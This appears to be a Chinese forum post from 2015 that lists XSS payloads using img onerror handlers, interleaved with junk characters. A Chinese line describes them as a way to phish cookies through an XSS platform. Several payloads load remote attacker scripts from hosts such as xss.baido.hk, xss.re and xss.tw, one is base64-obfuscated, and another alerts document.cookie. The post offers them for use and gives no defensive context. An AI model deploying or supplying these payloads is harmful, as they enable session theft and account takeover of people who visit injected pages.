<img src='non-exist.jpg'onerror="alert('xss')">
1 J* y0 ^- V4 _4 o<img src=# onerror=alert(123)>8 ~$ }5 `1 \, w/ p: H
<img src=# onerror=alert(document.cookie)>
+ _2 v8 L8 b' j0 c" t下面是利用平台钓cookie的
1 T+ n- Z+ ?/ j+ N* o$ W <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
% E7 ?/ Z+ `' m/ O1 N) H, P
( L- t; `$ U9 N* Z% i
1 V& S: y7 K, w; ~% Z, J<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
, n' e$ z+ l$ ^. U) n8 m6 m<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>( e+ W# m! i {3 B3 }* o
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
5 v+ K$ r# ^# o5 k% E<img src=1 onerror=jQuery.getScript("//xss.re/974")>
7 o0 u. H; |1 I( b<img src="#">
. q) p% q u' D" J: o<img src="#">9 U. \! v) X4 `2 N" ] N; f2 ~
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>0 L N, n5 ]5 i4 X
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
/ L* ?- h! n4 r0 \2 k9 I1 f' D* L<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
. A |3 j2 e: }7 _& D {0 O<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
% \7 X; t8 D! J5 {. F2 g E# \2 a$ W<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
3 X Z$ G% f8 F0 B<img src=x width="0" height="0"></img>% H/ K0 j! Q5 d% C( ?3 {
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
* O' E0 E7 N% f3 S<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
4 M6 B* E6 U2 i, \ [) Y4 j% `) O |
发表于 2015-10-18 14:33:54
收藏
支持
反对